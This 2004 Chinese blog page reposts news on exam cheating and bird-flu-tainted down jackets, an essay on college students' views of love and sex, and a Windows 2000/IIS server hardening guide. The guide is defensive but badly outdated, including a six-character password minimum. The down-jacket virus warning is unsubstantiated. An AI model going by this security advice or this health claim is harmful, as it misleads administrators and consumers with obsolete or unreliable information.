[ 2004/11/08 13:24 | by 网络毛毛虫 ]
[img align=F]http://image2.sina.com.cn/dy/w/2004-11-07/U397P1T1D4840245F21DT20041107110332.jpg[/img]
[img align=F]http://image2.sina.com.cn/dy/w/2004-11-07/U39P1T1D4840245F23DT20041107110332.jpg[/img]
[img align=F]http://image2.sina.com.cn/dy/w/2004-11-07/U39P1T1D4840245F1394DT20041107110332.jpg[/img]
[img align=F]http://image2.sina.com.cn/dy/w/2004-11-07/U39P1T1D4840245F23DT20041107110332.jpg[/img]
[img align=F]http://image2.sina.com.cn/dy/w/2004-11-07/U39P1T1D4840245F1394DT20041107110332.jpg[/img]
[ 2004/11/08 13:20 | by 网络毛毛虫 ]
资料图:在河南多数本科考场,考生进门之前都要接受监考老师手持的“手机探测器”检查。(图片来源:大河报)
[img align=F]http://image2.sina.com.cn/dy/e/2004-10-18/U686P1T1D4618915F21DT20041018100351.jpg[/img]
本报讯 高等教育自学考试上周末结束,记者昨天从北京教育考试院获悉,本次共有253名考生违纪、作弊,他们都受到取消考试成绩或者停考的处罚。今年10月的高自考,北京共有22万多名考生报名参加60多万科次考试。
利用手机作弊、夹带、传递小纸条等仍然是高自考作弊的主要方式。据海淀、崇文等担任本次监考任务的老师介绍,有的考生把复习资料抄在小纸片上,折叠起来只有火柴盒
那么大;还有的考生则将书本裹在大衣里带进考场等。记者在崇文区某考点采访时,刚好发现一名考生与监考老师发生争执,是因为考试结束信号已经发出而他仍在继续答题。
据悉,今年10月高自考作弊考生处罚,首次使用今年新颁布的《国家教育考试违规处理办法》。事实上,新《办法》的实行已经极大地遏制了手机等作弊方式。从东城、崇文、朝阳、大兴等四区发现的24个违纪考生看,无一例是因为使用手机而违规的。按照新《办法》规定,考生如果在考试过程中使用通信设备(包括手机),不仅要被取消本次所有报考科目的成绩,还要受到停考两年的处罚。
“今年高自考对考生违纪、作弊处罚,首次使用《国家教育考试违规处理办法》,想作弊的考生自己心理有了警戒线。”大兴招生考试中心自考办主任刘新华说,“由于新《办法》的震慑作用,违纪、作弊考生自然就少了。”刘新华介绍,本次举行的高自考,大兴区仅发现一例考生违纪,而在往年怎么也得有三四个。
新《办法》的实行也使得不服处理决定的高自考考生获得了行政复议或者行政诉讼权。昨天记者获悉,截至目前,市自考办还没有收到任何一名受处罚考生提出的相关申请。市自考办有关人士解释,主要是考试机构对违纪、作弊考生的处理事实清楚,依据准确。作者:邓兴军
[img align=F]http://image2.sina.com.cn/dy/e/2004-10-18/U686P1T1D4618915F21DT20041018100351.jpg[/img]
本报讯 高等教育自学考试上周末结束,记者昨天从北京教育考试院获悉,本次共有253名考生违纪、作弊,他们都受到取消考试成绩或者停考的处罚。今年10月的高自考,北京共有22万多名考生报名参加60多万科次考试。
利用手机作弊、夹带、传递小纸条等仍然是高自考作弊的主要方式。据海淀、崇文等担任本次监考任务的老师介绍,有的考生把复习资料抄在小纸片上,折叠起来只有火柴盒
那么大;还有的考生则将书本裹在大衣里带进考场等。记者在崇文区某考点采访时,刚好发现一名考生与监考老师发生争执,是因为考试结束信号已经发出而他仍在继续答题。
据悉,今年10月高自考作弊考生处罚,首次使用今年新颁布的《国家教育考试违规处理办法》。事实上,新《办法》的实行已经极大地遏制了手机等作弊方式。从东城、崇文、朝阳、大兴等四区发现的24个违纪考生看,无一例是因为使用手机而违规的。按照新《办法》规定,考生如果在考试过程中使用通信设备(包括手机),不仅要被取消本次所有报考科目的成绩,还要受到停考两年的处罚。
“今年高自考对考生违纪、作弊处罚,首次使用《国家教育考试违规处理办法》,想作弊的考生自己心理有了警戒线。”大兴招生考试中心自考办主任刘新华说,“由于新《办法》的震慑作用,违纪、作弊考生自然就少了。”刘新华介绍,本次举行的高自考,大兴区仅发现一例考生违纪,而在往年怎么也得有三四个。
新《办法》的实行也使得不服处理决定的高自考考生获得了行政复议或者行政诉讼权。昨天记者获悉,截至目前,市自考办还没有收到任何一名受处罚考生提出的相关申请。市自考办有关人士解释,主要是考试机构对违纪、作弊考生的处理事实清楚,依据准确。作者:邓兴军
[ 2004/11/08 13:19 | by 网络毛毛虫 ]
四川在线消息 记者昨日从四川羽绒工业协会获悉,带有禽流感病毒的羽绒服流入成都,消费者在购买羽绒服时一定要谨慎,谨防买到有毒衣服。
据四川省羽绒工业协会透露,今年10月中旬以来,有关部门在重庆市发现有30多家打着北京、上海等产地旗号的劣质羽绒服,而这些羽绒服很可能带有禽流感病毒。该协会对成都荷花池服装批发市场调查发现,劣质羽绒制品已经流入成都,并且在峨眉山等城市也发现了踪影。四川质量报 记者关义霞 实习生邱林
完了,完了。又有好受的了。
据四川省羽绒工业协会透露,今年10月中旬以来,有关部门在重庆市发现有30多家打着北京、上海等产地旗号的劣质羽绒服,而这些羽绒服很可能带有禽流感病毒。该协会对成都荷花池服装批发市场调查发现,劣质羽绒制品已经流入成都,并且在峨眉山等城市也发现了踪影。四川质量报 记者关义霞 实习生邱林
完了,完了。又有好受的了。
[ 2004/11/08 00:40 | by 网络毛毛虫 ]
当代大学生新型恋爱观探析
刘文
摘要:近年来,传统的大学生恋爱观不断受到着各种因素的冲击,并形成了一些新的特点,本文分析了新型的大学生恋爱观并对此进行了探讨。
关键词:大学生;恋爱观;性行为
一,历史上的爱情观
爱情——古老而长新的话题,那么到底什么是爱情呢?
柏拉图(Plato)认为,爱情分肉体之爱和精神(心灵)之爱两种,肉体之爱是低级的、卑俗的,心灵之爱是高级的、高尚的、是真正的爱情。【1】这种“唯精神论”的爱情观力图使爱情充满高尚的精神,有着浓厚的禁欲主义色彩。
罗素(Bertrand Russell)认为,性欲是爱情产生的根源,爱情的目的也就是为了性欲的满足。【1】对性的压抑将会导致性饥饿,愈压抑愈强烈,最后将会疯狂的发作,使性行为变得野兽般野蛮,失去文明性,所以应该尊重人对性的需要。
由上述两种观点可以看出,人们对爱情认识的差别是相当大的。分歧主要集中在爱情到底是“精神之爱”还是“肉体之爱”上。在此基础上,心理学家斯腾伯格(Sternberg)提出了爱情三元论的观点。该理论认为人类的爱情由三种成分组成:(1)动机成分:虽然对人类来说爱情的动机未必全是生理上的需求,但性驱力以及相应的诱因无疑是非常重要的。(2)情绪成分:酸甜苦辣的爱情滋味。(3)认知成分:认知是一种控制因素,斟酌爱情的热度并予以调节。爱情就是由这三种成分彼此以不等量的混合所演绎的。
二, 当代大学生的新型恋爱观
人的爱情观由爱情价值观、爱情道德观和性心理组成,这三者相互作用、相互影响,形成了人们对爱情的看法。进年来由于种种原因…当代大学生的爱情观与传统爱情观相比已经发生的非常显著的变化,这种变化,给高校管理带来了一系列的问题。因此,重新认识和评价当代大学生的恋爱观就显得非常有必要了。
综合各因素分析,当代大学生的新型恋爱观主要体现在以下几个方面。
1,注重恋爱过程,轻视恋爱结果。根据调查,多数学生把恋爱的目的描述为“体验幸福”和“充实大学生活”,只有少数学生表示恋爱是为了“将来结婚成家”。由此可以看出,当代大学生注重的是恋爱过程本身,而不是恋爱的结果。这一观念的转变表面上是对爱的权利的强调,实际上反映出了大学生对承担责任的逃避。这种逃避到底是大学生普遍缺乏责任心还是当代大学生由于未来的不确定性没有承担责任的基础,有待于进一步的研究。
2,恋爱观念开放,传统道德淡化。长期以来中国传统文化及伦理道德观对以往的大学生影响较深,但随着对外开放的不断扩大,西方某些开放性的婚姻观念对大学生的影响渐深,使得学生常常处于理智与情感矛盾的旋涡中。纸上报端,大学生多角恋爱、在外同居的现象时有出现。
3,主观上认为爱情与学业并不冲突。调查结果表明大多数学生能够正确看待学业与爱情的关系,他们赞成大学阶段应该以学业为主,爱情应当服从学业。同时他们又渴望自己可以爱情学业两不误,认为自己有能力处理好这两者的关系。但从个案分析和访谈中可以发现,这只是学生们的主观愿望,实际上真正可以做到的并不多。有句俗语叫做“爱情让人变笨”,特别是那些情窦初开的学生,很容易被强烈的情感冲昏了头脑,感情与理智的天平不由自主的就倾斜了。
4,宽容对待失恋。大学生恋爱最终“终成眷属”的毕竟很少,这样就很自然的有了失恋者。感情遇到挫折后出现一段心理阴暗期是很正常的。调查显示,大多数失恋的大学生会通过“找朋友诉说”和“理性思考”对自己和对方采取宽容的态度,尊重对方的选择。
5,恋爱目的功利化。功利型恋爱观是把感情建立在对方家庭的经济条件、社会地位上,或以自己家庭的优越条件为资本,视对方家庭条件为双方感情的基础。传统上认为女性具有强烈的依赖思想,希望把自己的将来寄托在一个可靠的人身上,而缺乏上进心。但事实上,当代大学男生的功利化色彩也越来越明显,交往对象的家庭背景和经济状况往往成为他们关注的重点,把今后的前途寄托在从对方那里得到好处上。功利型恋爱观的产生是有其原因的。既与客观上的家庭经济条件差、就业压力大、社会不良影响有关,也和主观上个人在心理上的成熟程度有关。
6,恋爱场所网络化。随着互联网的普及,网恋成为一种新的恋爱方式。【2】互联网络特有的便捷性、隐蔽性等优势让大学生很快地接受了这一恋爱方式,甚至在某种程度上网恋成了一种时尚活动。特别是一些进入大学后刚刚接触到网络的学生,往往由于自控能力较差而陷入网络不能自拔。空闲时间多、上网方便的大学生自然对这一方式趋之若骛。
7,性观念的显著变化。性观念是人们对性问题的较为稳定的看法及所持有的态度评价,既包括个体的性观念,也包括在一定时代的社会背景下,人们对性问题的评价、态度、看法的总体趋势。【1】
长春某高校以“关注人性关心健康关爱自己”为主题,就当代学生性观念、性行为与性教育状况做了近一个多月的问卷调查。【3】
调查数据中表明,有20.95%的人对“性”很有兴趣,有58.11%的人认为“性”像吃饭一样普通,不必刻意回避,17.57%的人表示对“性”丝毫没有兴趣,而表现出十分厌恶“性”的只占到3.38%。由这些数据可以看出,学生们可以比较坦然地面对“性”这一话题。
对婚前性行为的接受程度的调查中,有10.4%的人坚决反对,52.68%的人不反对,也并不完全赞成,30.41%的人赞同建立在感情基础上的婚前性行为,还有6.71%的人认为性行为是满足生理需要,与婚姻和感情无关,没感情也可发生性行为。同时调查还表明现在一些女大学生已把肉体的“贞洁”与灵魂的纯洁区别开来,性不足以成为两人关系将发展到确立婚姻的证明。
在“与恋人的接触程度”的调查中,11.8%的人没有身体接触,而有牵手、拥抱、接吻的人占62.11%,17.39%的人有性抚摸的行为,8.7%的人已发生了性行为。调查表明,已有将近1/10恋爱的学生发生性行为。
这次调查显示发生过性行为的人数比例占这次总人数的13.66%,而这部分大学生发生性行为时的动机却是复杂多样的:追求性的欢快感占18.75%;为发展爱情占28.13%;一时感情冲动不能自控的占31.25%;为排除孤独感的占31.25%;其他因素的占15.62%。从这组统计结果可以看出大学生对如何对待“性冲动”并不能有很好地把握。
当代大学生性观念的转变是有其客观原因的。
首先,整个社会对“性”的观念已经发生了很大的变化,人们对讳莫如深避而不谈的“性”已经从严格的禁忌过渡到相对的宽容。
其次,西方性解放的影响,现代通讯技术的发展使当代大学生有便利的条件接触到西方各种文化思潮,很多学生或多或少对弗洛伊德、马尔库塞有所了解,此外流行的港台文化也给传统文化以强烈的冲击。
再次,由于生理和心理的原因,出于对“性”的好奇而大胆地尝试体验“性”,是带有十分强烈的情感倾向的。
三, 当代大学生新型恋爱观探析
尽管当代大学生的恋爱观存在着很多问题,但毕竟这是时代发展的必然结果,有其积极的意义。传统的恋爱观已经不能满足当代大学生的需要,这也是客观事实。因此,整合传统和现代两种恋爱观就显得日益迫切。
当代大学生的独立性和自主性决定了靠规章制度和学生管理不可能从根本上解决学生在恋爱过程中出现的问题,只有让学生知道什么是恋爱、如何去恋爱以及什么样的恋爱观才是比较合适的才能让他们自觉的纠正自己的恋爱偏差行为,避免恋爱错罪行为的发生。
目前的大多数研究还停留在对当代大学生新型恋爱观的理性分析上,而在此基础上的实证研究和深入探讨并不多见。笔者以为,应该尽快在实证研究的基础上整合这两种恋爱观念,形成一套比较系统的,能为当代青年广泛接受的理论。同时在各级高校将心理健康课程作为一门必修课程来开设并建立与之相对应的心理咨询系统,宣传心理咨询观念。
此外笔者还发现,很多研究者在研究和讨论大学生恋爱观的教育和引导时,都提出要大学生守住底线,不进行婚前性行为。而对其他的边缘性行为如接吻、抚摸等时则态度比较宽容。我想,研究者们之所以对这一点尤其强调,其一是受传统贞洁观的影响,其二就是由于婚前性行为会带来一个无法避免的问题——怀孕。
有迹象表明,在医院接受人工引产的女性中,未婚女性无论是在人数上还是在占总人数的比率上都呈显著性的上升趋势。浙江青年报报道:杭州市中医院一位妇科医生告诉记者,现在学生中堕胎现象确实比前几年多了,特别是寒署假一过,来“看病”的女孩就特别多。现代快报报道:南京市妇幼保健院院长陈静琴告诉记者,近年来做人流者逐年上升,而且出现低龄化、人流次数频繁、未婚者及未成年人增多现象。
这说明一个什么问题?不进行婚前性行为这一道德底线已经失守了。对婚前性行为的接受程度的调查中,不是已经有30.41%的人赞同建立在感情基础上的婚前性行为了吗?还有6.71%的人认为性行为是满足生理需要,与婚姻和感情无关,没感情也可发生性行为。
这一事实说明,片面的苛求当代大学生遵守不发生婚前性行为已经不切实际。对这一问题的教育与引导,如果还是停留在对底线的坚守上,已经不会有多少用处了。较好的解决这一问题,应该做好以下工作
1,加强对女生的教育
女生较男生而言情感更为丰富,又由于生理上的客观因素,发生性行为后,遭受痛苦和伤害的也往往是女性。因此指导女生在恋爱过程中学会保护自己就尤为显得重要了。
一方面要引导女生正确处理理智与情感的关系,另一方面,要让女生了解自己和了解女性的生理特点,这包括对女性生理周期、对受精与怀孕、怀孕的后果以及接受人工引产对女性身体的危害的认识。
2,指导学生避孕
指导学生避孕并不意味着对婚前性行为的赞成,指导学生避孕只是为了避免更大家更不愿意看到的后果的出现。指导学生避孕在内容上应包括怀孕与避孕的知识、避孕的方式及安全性和怀孕的后果等内容。
3,对学生进行生命和健康教育
对学生进行生命和健康教育包括让学生了解生命的宝贵,让学生了解孕育一个生命的艰难,让学生了解自己是怎么来到这个世界上的以及性行为可能对健康造成的危害。这其中又包括性病、爱滋病的危害和传播途径。
参考文献:
【1】黄希庭,郑涌.当代中国大学生心理特点与教育【M】,上海教育出版社,1999.
【2】吴咏梅,车定祥,易国才.论上网对大学生恋爱观的负面影响及其对策【J】,襄樊职业技术学校学报,2003,8.
【3】http://www.sina.com.cn 2004,04,25 10:32
刘文
摘要:近年来,传统的大学生恋爱观不断受到着各种因素的冲击,并形成了一些新的特点,本文分析了新型的大学生恋爱观并对此进行了探讨。
关键词:大学生;恋爱观;性行为
一,历史上的爱情观
爱情——古老而长新的话题,那么到底什么是爱情呢?
柏拉图(Plato)认为,爱情分肉体之爱和精神(心灵)之爱两种,肉体之爱是低级的、卑俗的,心灵之爱是高级的、高尚的、是真正的爱情。【1】这种“唯精神论”的爱情观力图使爱情充满高尚的精神,有着浓厚的禁欲主义色彩。
罗素(Bertrand Russell)认为,性欲是爱情产生的根源,爱情的目的也就是为了性欲的满足。【1】对性的压抑将会导致性饥饿,愈压抑愈强烈,最后将会疯狂的发作,使性行为变得野兽般野蛮,失去文明性,所以应该尊重人对性的需要。
由上述两种观点可以看出,人们对爱情认识的差别是相当大的。分歧主要集中在爱情到底是“精神之爱”还是“肉体之爱”上。在此基础上,心理学家斯腾伯格(Sternberg)提出了爱情三元论的观点。该理论认为人类的爱情由三种成分组成:(1)动机成分:虽然对人类来说爱情的动机未必全是生理上的需求,但性驱力以及相应的诱因无疑是非常重要的。(2)情绪成分:酸甜苦辣的爱情滋味。(3)认知成分:认知是一种控制因素,斟酌爱情的热度并予以调节。爱情就是由这三种成分彼此以不等量的混合所演绎的。
二, 当代大学生的新型恋爱观
人的爱情观由爱情价值观、爱情道德观和性心理组成,这三者相互作用、相互影响,形成了人们对爱情的看法。进年来由于种种原因…当代大学生的爱情观与传统爱情观相比已经发生的非常显著的变化,这种变化,给高校管理带来了一系列的问题。因此,重新认识和评价当代大学生的恋爱观就显得非常有必要了。
综合各因素分析,当代大学生的新型恋爱观主要体现在以下几个方面。
1,注重恋爱过程,轻视恋爱结果。根据调查,多数学生把恋爱的目的描述为“体验幸福”和“充实大学生活”,只有少数学生表示恋爱是为了“将来结婚成家”。由此可以看出,当代大学生注重的是恋爱过程本身,而不是恋爱的结果。这一观念的转变表面上是对爱的权利的强调,实际上反映出了大学生对承担责任的逃避。这种逃避到底是大学生普遍缺乏责任心还是当代大学生由于未来的不确定性没有承担责任的基础,有待于进一步的研究。
2,恋爱观念开放,传统道德淡化。长期以来中国传统文化及伦理道德观对以往的大学生影响较深,但随着对外开放的不断扩大,西方某些开放性的婚姻观念对大学生的影响渐深,使得学生常常处于理智与情感矛盾的旋涡中。纸上报端,大学生多角恋爱、在外同居的现象时有出现。
3,主观上认为爱情与学业并不冲突。调查结果表明大多数学生能够正确看待学业与爱情的关系,他们赞成大学阶段应该以学业为主,爱情应当服从学业。同时他们又渴望自己可以爱情学业两不误,认为自己有能力处理好这两者的关系。但从个案分析和访谈中可以发现,这只是学生们的主观愿望,实际上真正可以做到的并不多。有句俗语叫做“爱情让人变笨”,特别是那些情窦初开的学生,很容易被强烈的情感冲昏了头脑,感情与理智的天平不由自主的就倾斜了。
4,宽容对待失恋。大学生恋爱最终“终成眷属”的毕竟很少,这样就很自然的有了失恋者。感情遇到挫折后出现一段心理阴暗期是很正常的。调查显示,大多数失恋的大学生会通过“找朋友诉说”和“理性思考”对自己和对方采取宽容的态度,尊重对方的选择。
5,恋爱目的功利化。功利型恋爱观是把感情建立在对方家庭的经济条件、社会地位上,或以自己家庭的优越条件为资本,视对方家庭条件为双方感情的基础。传统上认为女性具有强烈的依赖思想,希望把自己的将来寄托在一个可靠的人身上,而缺乏上进心。但事实上,当代大学男生的功利化色彩也越来越明显,交往对象的家庭背景和经济状况往往成为他们关注的重点,把今后的前途寄托在从对方那里得到好处上。功利型恋爱观的产生是有其原因的。既与客观上的家庭经济条件差、就业压力大、社会不良影响有关,也和主观上个人在心理上的成熟程度有关。
6,恋爱场所网络化。随着互联网的普及,网恋成为一种新的恋爱方式。【2】互联网络特有的便捷性、隐蔽性等优势让大学生很快地接受了这一恋爱方式,甚至在某种程度上网恋成了一种时尚活动。特别是一些进入大学后刚刚接触到网络的学生,往往由于自控能力较差而陷入网络不能自拔。空闲时间多、上网方便的大学生自然对这一方式趋之若骛。
7,性观念的显著变化。性观念是人们对性问题的较为稳定的看法及所持有的态度评价,既包括个体的性观念,也包括在一定时代的社会背景下,人们对性问题的评价、态度、看法的总体趋势。【1】
长春某高校以“关注人性关心健康关爱自己”为主题,就当代学生性观念、性行为与性教育状况做了近一个多月的问卷调查。【3】
调查数据中表明,有20.95%的人对“性”很有兴趣,有58.11%的人认为“性”像吃饭一样普通,不必刻意回避,17.57%的人表示对“性”丝毫没有兴趣,而表现出十分厌恶“性”的只占到3.38%。由这些数据可以看出,学生们可以比较坦然地面对“性”这一话题。
对婚前性行为的接受程度的调查中,有10.4%的人坚决反对,52.68%的人不反对,也并不完全赞成,30.41%的人赞同建立在感情基础上的婚前性行为,还有6.71%的人认为性行为是满足生理需要,与婚姻和感情无关,没感情也可发生性行为。同时调查还表明现在一些女大学生已把肉体的“贞洁”与灵魂的纯洁区别开来,性不足以成为两人关系将发展到确立婚姻的证明。
在“与恋人的接触程度”的调查中,11.8%的人没有身体接触,而有牵手、拥抱、接吻的人占62.11%,17.39%的人有性抚摸的行为,8.7%的人已发生了性行为。调查表明,已有将近1/10恋爱的学生发生性行为。
这次调查显示发生过性行为的人数比例占这次总人数的13.66%,而这部分大学生发生性行为时的动机却是复杂多样的:追求性的欢快感占18.75%;为发展爱情占28.13%;一时感情冲动不能自控的占31.25%;为排除孤独感的占31.25%;其他因素的占15.62%。从这组统计结果可以看出大学生对如何对待“性冲动”并不能有很好地把握。
当代大学生性观念的转变是有其客观原因的。
首先,整个社会对“性”的观念已经发生了很大的变化,人们对讳莫如深避而不谈的“性”已经从严格的禁忌过渡到相对的宽容。
其次,西方性解放的影响,现代通讯技术的发展使当代大学生有便利的条件接触到西方各种文化思潮,很多学生或多或少对弗洛伊德、马尔库塞有所了解,此外流行的港台文化也给传统文化以强烈的冲击。
再次,由于生理和心理的原因,出于对“性”的好奇而大胆地尝试体验“性”,是带有十分强烈的情感倾向的。
三, 当代大学生新型恋爱观探析
尽管当代大学生的恋爱观存在着很多问题,但毕竟这是时代发展的必然结果,有其积极的意义。传统的恋爱观已经不能满足当代大学生的需要,这也是客观事实。因此,整合传统和现代两种恋爱观就显得日益迫切。
当代大学生的独立性和自主性决定了靠规章制度和学生管理不可能从根本上解决学生在恋爱过程中出现的问题,只有让学生知道什么是恋爱、如何去恋爱以及什么样的恋爱观才是比较合适的才能让他们自觉的纠正自己的恋爱偏差行为,避免恋爱错罪行为的发生。
目前的大多数研究还停留在对当代大学生新型恋爱观的理性分析上,而在此基础上的实证研究和深入探讨并不多见。笔者以为,应该尽快在实证研究的基础上整合这两种恋爱观念,形成一套比较系统的,能为当代青年广泛接受的理论。同时在各级高校将心理健康课程作为一门必修课程来开设并建立与之相对应的心理咨询系统,宣传心理咨询观念。
此外笔者还发现,很多研究者在研究和讨论大学生恋爱观的教育和引导时,都提出要大学生守住底线,不进行婚前性行为。而对其他的边缘性行为如接吻、抚摸等时则态度比较宽容。我想,研究者们之所以对这一点尤其强调,其一是受传统贞洁观的影响,其二就是由于婚前性行为会带来一个无法避免的问题——怀孕。
有迹象表明,在医院接受人工引产的女性中,未婚女性无论是在人数上还是在占总人数的比率上都呈显著性的上升趋势。浙江青年报报道:杭州市中医院一位妇科医生告诉记者,现在学生中堕胎现象确实比前几年多了,特别是寒署假一过,来“看病”的女孩就特别多。现代快报报道:南京市妇幼保健院院长陈静琴告诉记者,近年来做人流者逐年上升,而且出现低龄化、人流次数频繁、未婚者及未成年人增多现象。
这说明一个什么问题?不进行婚前性行为这一道德底线已经失守了。对婚前性行为的接受程度的调查中,不是已经有30.41%的人赞同建立在感情基础上的婚前性行为了吗?还有6.71%的人认为性行为是满足生理需要,与婚姻和感情无关,没感情也可发生性行为。
这一事实说明,片面的苛求当代大学生遵守不发生婚前性行为已经不切实际。对这一问题的教育与引导,如果还是停留在对底线的坚守上,已经不会有多少用处了。较好的解决这一问题,应该做好以下工作
1,加强对女生的教育
女生较男生而言情感更为丰富,又由于生理上的客观因素,发生性行为后,遭受痛苦和伤害的也往往是女性。因此指导女生在恋爱过程中学会保护自己就尤为显得重要了。
一方面要引导女生正确处理理智与情感的关系,另一方面,要让女生了解自己和了解女性的生理特点,这包括对女性生理周期、对受精与怀孕、怀孕的后果以及接受人工引产对女性身体的危害的认识。
2,指导学生避孕
指导学生避孕并不意味着对婚前性行为的赞成,指导学生避孕只是为了避免更大家更不愿意看到的后果的出现。指导学生避孕在内容上应包括怀孕与避孕的知识、避孕的方式及安全性和怀孕的后果等内容。
3,对学生进行生命和健康教育
对学生进行生命和健康教育包括让学生了解生命的宝贵,让学生了解孕育一个生命的艰难,让学生了解自己是怎么来到这个世界上的以及性行为可能对健康造成的危害。这其中又包括性病、爱滋病的危害和传播途径。
参考文献:
【1】黄希庭,郑涌.当代中国大学生心理特点与教育【M】,上海教育出版社,1999.
【2】吴咏梅,车定祥,易国才.论上网对大学生恋爱观的负面影响及其对策【J】,襄樊职业技术学校学报,2003,8.
【3】http://www.sina.com.cn 2004,04,25 10:32
[ 2004/11/06 00:24 | by 网络毛毛虫 ]
NTFS比FAT分区多了安全控制功能,可以对不同的文件夹设置不同的访问权限,安全性增强。
2.建议最好一次性全部安装成NTFS分区,而不要先安装成FAT分区再转化为NTFS分区,这样做在安装了SP5和SP6的情况下会导致转化不成功,甚至系统崩溃。
3.安装NTFS分区有一个潜在的危险,就是目前大多数反病毒软件没有提供对软盘启动后NTFS分区病毒的查杀,这样一旦系统中了恶性病毒而导致系统不能正常启动,后果就比较严重,因此及建议平时做好防病毒工作。
4.分区和逻辑盘的分配
推荐的安全配置是建立三个逻辑驱动器,第一个大于2G,用来装系统和重要的日志文件,第二个放IIS,第三个放FTP,这样无论IIS或FTP出了安全漏洞都不会直接影响到系统目录和系统文件。要知道,IIS和FTP是对外服务的,比较容易出问题。而把IIS和FTP分开主要是为了防止入侵者上传程序并从IIS中运行。
5.安装顺序的选择:
win2000在安装中有几个顺序是一定要注意的: 首先,何时接入网络:Win2000在安装时有一个漏洞,在你输入Administrator密码后,系统就建立了ADMIN$的共享,但是并没有用你刚刚输入的密码来保护它,这种情况一直持续到你再次启动后,在此期间,任何人都可以通过ADMIN$进入你的机器;同时,只要安装一完成,各种服务就会自动运行,而这时的服务器是满身漏洞,非常容易进入的,因此,在完全安装并配置好win2000 SERVER之前,一定不要把主机接入网络。 其次,补丁的安装:补丁的安装应该在所有应用程序安装完之后,因为补丁程序往往要替换/修改某些系统文件,如果先安装补丁再安装应用程序有可能导致补丁不能起到应有的效果,例如:IIS的HotFix就要求每次更改IIS的配置都需要安装
6.端口是计算机和外部网络相连的逻辑接口,也是计算机的第一道屏障,端口配置正确与否直接影响到主机的安全,一般来说,仅打开你需要使用的端口会比较安全,配置的方法是在网卡属性-TCP/IP-高级-选项-TCP/IP筛选中启用TCP/IP筛选,不过对于win2000的端口过滤来说,有一个不好的特性:只能规定开哪些端口,不能规定关闭哪些端口,这样对于需要开大量端口的用户就比较痛苦。
7.IIS是微软的组件中漏洞最多的一个,平均两三个月就要出一个漏洞,而微软的IIS默认安装又实在不敢恭维,所以IIS的配置是我们的重点,现在大家跟着我一起来:首先,把C盘那个什么Inetpub目录彻底删掉,在D盘建一个Inetpub(要是你不放心用默认目录名也可以改一个名字,但是自己要记得)在IIS管理器中将主目录指向D:\Inetpub;其次,那个IIS安装时默认的什么scripts等虚拟目录一概删除,如果你需要什么权限的目录可以自己慢慢建,需要什么权限开什么。(特别注意写权限和执行程序的权限,没有绝对的必要千万不要给)第三,应用程序配置:在IIS管理器中删除必须之外的任何无用映射,必须指的是ASP,ASA和其他你确实需要用到的文件类型,例如你用到stml等(使用server side include),实际上90%的主机有了上面两个映射就够了,其余的映射几乎每个都有一个凄惨的故事:htw, htr, idq, ida……想知道这些故事?去查以前的漏洞列表吧。在IIS管理器中右击主机->属性->WWW服务 编辑->主目录配置->应用程序映射,然后就开始一个个删吧(里面没有全选的,嘿嘿)。接着在刚刚那个窗口的应用程序调试书签内将脚本错误消息改为发送文本(除非你想ASP出错的时候用户知道你的程序/网络/数据库结构)错误文本写什么?随便你喜欢,自己看着办。点击确定退出时别忘了让虚拟站点继承你设定的属性。安装新的Service Pack后,IIS的应用程序映射应重新设置。(说明:安装新的Service Pack后,某些应用程序映射又会出现,导致出现安全漏洞。这是管理员较易忽视的一点。)
为了对付日益增多的cgi漏洞扫描器,还有一个小技巧可以参考,在IIS中将HTTP404 Object Not Found出错页面通过URL重定向到一个定制HTM文件,可以让目前绝大多数CGI漏洞扫描器失灵。其实原因很简单,大多数CGI扫描器在编写时为了方便,都是通过查看返回页面的HTTP代码来判断漏洞是否存在的,例如,著名的IDQ漏洞一般都是通过取1.idq来检验,如果返回HTTP200,就认为是有这个漏洞,反之如果返回HTTP404就认为没有,如果你通过URL将HTTP404出错信息重定向到HTTP404.htm文件,那么所有的扫描无论存不存在漏洞都会返回HTTP200,90%的CGI扫描器会认为你什么漏洞都有,结果反而掩盖了你真正的漏洞,让入侵者茫然无处下手,不过从个人角度来说,我还是认为扎扎实实做好安全设置比这样的小技巧重要的多。
最后,为了保险起见,你可以使用IIS的备份功能,将刚刚的设定全部备份下来,这样就可以随时恢复IIS的安全配置。还有,如果你怕IIS负荷过高导致服务器满负荷死机,也可以在性能中打开CPU限制,例如将IIS的最大CPU使用率限制在70%。
8.帐号尽可能少,且尽可能少用来登录;
说明:网站帐号一般只用来做系统维护,多余的帐号一个也不要,因为多一个帐号就会多一份被攻破的危险。
除过Administrator外,有必要再增加一个属于管理员组的帐号;
说明:两个管理员组的帐号,一方面防止管理员一旦忘记一个帐号的口令还
有一个备用帐号;另方面,一旦黑客攻破一个帐号并更改口令,我们还有有机会重新在短期内取得控制权。
所有帐号权限需严格控制,轻易不要给帐号以特殊权限;
将Administrator重命名,改为一个不易猜的名字。其他一般帐号也应尊循这一原则。
说明:这样可以为黑客攻击增加一层障碍。
将Guest帐号禁用,同时重命名为一个复杂的名字,增加口令,并将它从
Guest组删掉;
说明:有的黑客工具正是利用了guest 的弱点,可以将帐号从一般用户提
升到管理员组。
给所有用户帐号一个复杂的口令(系统帐号出外),长度最少在8位以上, 且必须同时包含字母、数字、特殊字符。同时不要使用大家熟悉的单词(如microsoft)、熟悉的键盘顺序(如qwert)、熟悉的数字(如2000)等。
说明:口令是黑客攻击的重点,口令一旦被突破也就无任何系统安全可言了,而这往往是不少网管所忽视的地方,据我们的测试,仅字母加数字的5位口令在几分钟内就会被攻破,而所推荐的方案则要安全的多。
口令必须定期更改(建议至少两周该一次),且最好记在心里,除此以外不要在任何地方做记录;另外,如果在日志审核中发现某个帐号被连续尝试,则必须立刻更改此帐号(包括用户名和口令);
在帐号属性中设立锁定次数,比如改帐号失败登录次数超过5次即锁定改帐号。这样可以防止某些大规模的登录尝试,同时也使管理员对该帐号提高警惕。
9.Win2000的默认安装是不开任何安全审核的!
你到本地安全策略->审核策略中打开相应的审核,推荐的审核是:
账户管理 成功 失败
登录事件 成功 失败
对象访问 失败
策略更改 成功 失败
特权使用 失败
系统事件 成功 失败
目录服务访问 失败
账户登录事件 成功 失败
审核项目少的缺点是万一你想看发现没有记录那就一点都没辙;审核项目太多不仅会占用系统资源而且会导致你根本没空去看,这样就失去了审核的意义。 与之相关的是:
在账户策略->密码策略中设定:
密码复杂性要求 启用
密码长度最小值 6位
强制密码历史 5次
最长存留期 30天
在账户策略->账户锁定策略中设定:
账户锁定 3次错误登录
锁定时间 20分钟
复位锁定计数 20分钟
同样,Terminal Service的安全日志默认也是不开的,我们可以在Terminal Service Configration(远程服务配置)-权限-高级中配置安全审核,一般来说只要记录登录、注销事件就可以了。
